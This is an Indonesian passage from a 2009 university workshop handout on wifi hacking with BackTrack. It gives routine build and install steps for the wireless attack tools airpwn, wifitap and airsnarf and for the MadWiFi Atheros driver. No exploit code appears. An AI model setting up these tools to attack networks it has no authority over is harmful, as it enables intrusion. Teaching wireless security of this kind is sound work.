Langkah selanjutnya kita perlu menginstall source code kernel:( ... # cd /usr/local/src/airpwn-1.3 # ./configure # make # make install

Install Wifitap & Airsnarf # cd /usr/local/src/ # tar zxvf wifitap-0.4.0.tgz

Page 28: Materi Workshop Wifi Hacking With Backtrack Unair Des 2009

WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009

Instalasi Driver MadWiFi Bagi anda yang menggunakan chipset Atheros tampaknya perlu menginstalasi driver MadWiFi.

Instalasi kebutuhan untuk compile

# apt-get install build-essential perl

Download source code madwifi dari

http://ath5k.org/wiki/MadWifi http://sourceforge.net/project/showfiles.php?group_id=82936

Copy dan buka source code

# cp madwifi-0.9.4.tar.gz /usr/local/src/ # cd /usr/local/src # tar zxvf madwifi-0.9.4.tar.gz # cd /usr/local/src/madwifi-0.9.4

Compile & Install MadWifi Driver

# make # make install

Load module

# modprobe ath_pci Source : http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hacking (CL) Onno W. Purbo